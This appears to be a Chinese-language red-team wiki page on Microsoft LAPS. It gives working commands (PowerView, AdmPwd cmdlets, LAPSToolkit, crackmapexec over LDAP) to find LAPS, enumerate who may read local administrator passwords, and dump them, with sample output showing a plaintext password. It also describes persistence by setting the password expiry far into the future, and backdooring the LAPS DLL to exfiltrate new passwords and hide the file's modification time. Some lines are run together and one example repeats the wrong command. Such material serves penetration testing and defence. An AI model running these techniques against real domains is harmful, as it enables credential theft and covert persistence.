LAPS
基本信息
本地管理员密码解决方案(LAPS)是一种用于管理系统的工具,其中管理员密码是唯一的、随机的并且经常更改,应用于加入域的计算机。 这些密码安全地存储在Active Directory中,只有通过访问控制列表(ACL)授予权限的用户才能访问。 通过使用Kerberos版本5和高级加密标准(AES),确保了从客户端到服务器的密码传输的安全性。
在域的计算机对象中,LAPS的实施会添加两个新属性:ms-mcs-AdmPwd和ms-mcs-AdmPwdExpirationTime。 这些属性分别存储明文管理员密码和其过期时间。
检查是否已激活
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
dir "C:\Program Files\LAPS\CSE"
# Check if that folder exists and contains AdmPwd.dll
# Find GPOs that have "LAPS" or some other descriptive term in the name
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostnameLAPS密码访问
您可以从 \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol 下载原始的LAPS策略,然后使用 GPRegistryPolicyParser 包中的 Parse-PolFile 来将此文件转换为可读格式。
此外,如果安装在我们可以访问的计算机上,可以使用 本机LAPS PowerShell cmdlet:
Get-Command *AdmPwd*
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
# List who can read LAPS password of the given OU
Find-AdmPwdExtendedRights -Identity Workstations | fl
# Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | flPowerView 也可以用来找出谁可以读取密码并读取它:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl
# Read the password
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwdLAPSToolkit
LAPSToolkit 有助于枚举具有多个功能的 LAPS。
其中一个功能是解析具有 LAPS 启用的所有计算机的 ExtendedRights。这将显示专门被授予读取 LAPS 密码权限的 组,通常是受保护组中的用户。
一个已将计算机加入域的 帐户 将在该主机上获得 All Extended Rights,这个权限赋予了该 帐户 读取密码的能力。枚举可能显示一个用户帐户可以在主机上读取 LAPS 密码。这可以帮助我们 针对可以读取 LAPS 密码的特定 AD 用户。
# Get groups that can read passwords
Find-LAPSDelegatedGroups
OrgUnit Delegated Groups
------- ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin
# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName Identity Reason
------------ -------- ------
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins Delegated
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated
# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName Password Expiration
------------ -------- ----------
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41使用Crackmapexec转储LAPS密码
如果没有访问powershell的权限,您可以通过LDAP远程滥用此特权。
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M lapsLAPS Persistence
Expiration Date
一旦获得管理员权限,可以通过将到期日期设置为未来来获得密码并阻止计算机更新密码。
# Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
# Change expiration time
## It's needed SYSTEM on the computer
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}如果管理员使用**Reset-AdmPwdPassword命令; 或者在LAPS GPO中启用了不允许密码过期时间超过策略要求**,密码仍然会被重置。
后门
LAPS的原始源代码可以在这里找到,因此可以在代码中(例如在Main/AdmPwd.PS/Main.cs中的Get-AdmPwdPassword方法内)放置一个后门,以某种方式外泄新密码或将其存储在某处。
然后,只需编译新的AdmPwd.PS.dll并将其上传到C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll中的机器(并更改修改时间)。
参考资料
最后更新于